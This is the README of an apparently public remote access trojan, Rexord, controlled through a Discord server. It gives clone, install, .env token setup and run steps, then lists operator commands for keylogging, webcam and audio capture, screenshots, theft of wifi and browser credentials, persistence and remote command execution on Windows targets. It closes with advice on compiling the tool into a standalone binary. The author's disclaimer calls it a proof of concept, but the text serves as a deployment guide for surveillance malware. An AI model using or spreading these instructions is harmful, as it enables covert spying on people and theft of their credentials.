Though this binary is written in Python, it still has malicious capabilities. Do not run on systems that you do not have permission to use.
Rexord is a proof of concept RAT built off the Discord API. It is the first iteration of the hive mind malware (mk02, mk04, mk07). It was written in Python as a proof of concept after i accidentally discovered botnet capabilities within the Discord API. It is now archived and was never meant to become a serious malware, as I do not believe Python is a sufficient enough language to used for malware.
- Python 3.x
- Windows 10 Target
- Discord Server
- clone repository
git clone https://github.com/CosmodiumCS/MK02-Rexord
cd MK02-Rexord
- install the requirements
pip install -r requirements.txt
# install these libraries if on linux
# sudo apt-get install libportaudio2 python3-tk
- add your information to the
.env
file
TOKEN=YOUR_TOKEN_HERE
channel_id=CHANNEL_ID_HERE
channel_name=CHANNEL_NAME_HERE
- run the binary
python3 rexord.py
[+] Getting Started:
hello
- see connected targetsselect <target>
- connect to specified target ['all' by default]
[+] General:
help
- displays this menuupload <attachment>
- upload file(s) to targetdownload <filename>
- download file(s) [list multiple with ","]shutdown
- shuts down targetrestart
- restarts targetexit
- exits target [can't reconnect]killswitch
- uninstalls from target
[+] Payloads:
start keylogger
- starts live keyloggerstop keylogger
- stops live keyloggerwebcam
- take picture through target webcamscreenshot
- screenshot target computerrecord player <seconds>
- record audio from targetwifi creds
- gets wifi credentialsweb creds
- gets web credentials
[+] System:
persist
- executes persistence on target$<command>
- execute system command on targetprivate
- get private ip addresspublic
- get public ip addressos
- show os
Again, this was designed as a proof of concept, and not a legitimate malware. However, you can compile this binary using tools like Pyinstaller, Nuitka, and Py2Exe.